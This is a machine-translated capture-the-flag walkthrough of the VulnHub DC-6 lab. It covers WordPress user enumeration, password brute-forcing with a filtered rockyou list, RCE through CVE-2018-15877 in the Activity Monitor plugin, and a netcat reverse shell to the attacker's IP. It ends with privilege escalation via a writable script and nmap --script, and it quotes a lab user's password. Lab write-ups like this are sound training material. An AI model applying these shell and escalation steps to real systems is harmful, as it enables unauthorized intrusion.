Write it at the front

Range link ：
https://www.vulnhub.com/entry/dc-6,315/

Some knowledge points are DC:1 I mentioned , You can flip through

DC:1

Information gathering

Survival scan

here 61 It's the gateway 141 It's a physical machine 164 Target machine 115 For the attacker

Port scanning

Try to view , But somehow I jumped to a wordy The web page of

But packet capturing can respond and the response code is 200

Here is how to modify the configuration file , By modifying the apache Of htaccess file

The principle is pseudo static , It's not going to redirect 301 or 302, But it is also a kind of redirection .

By modifying the hosts file , You can access it through the browser , Of course , If you want to , Just look at the bag


obviously , Here is wordpress The fingerprints of , Use as before wpscan To scan , The options used are -e, Enumerate user name options .

For more details , and wpscan Tool information , You can click here DC_2

adopt api The following user name is obtained by interface explosion

Follow the usual line of thinking , Here you can start blasting , But I didn't react for a long time at first . I found out later , There are the following clues

Use this command

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

The order is to kali Carry out screening with your own big dictionary , Filter keywords k01 write in passwords.txt file , Note the new passwords.txt Dictionaries

Password found

Get the account password , Try... Separately ssh、 Website backstage

ssh Unable to enter .

Backstage access

Click casually to have a look , Nothing special , Installed a activity monitor plug-in unit , The breakthrough point should be here

Number ：CVE-2018-15877

Look for , can RCE

Call this directly poc Script , Successful entry , But at this time, it is a low authority user

It is inconvenient to execute commands in scripts , First bounce out and have a look , Use the following command directly nc Connect

nc 192.168.201.115 10050 -c /bin/bash

lookup suid file I haven't seen anything that can obviously raise the right for the time being

Query the home directory under the logged in user

Find a similar memo txt file ,cat once , Find sensitive information , There's a user graham GSo7isUM1D4

Also try logging in to this user ssh You can log in

see suid file , Obviously, there is a script that doesn't need a password

View the script , It's writable , Append the script , Let it bounce

After the rebound jens The account of , Keep looking at suid file , Here you are nmap classic suid Raise the right

nmap The right point of is , It can run scripts with current permissions , Here's a getroot.sh Use nmap The option to --script To run

Mention right to success , find flag file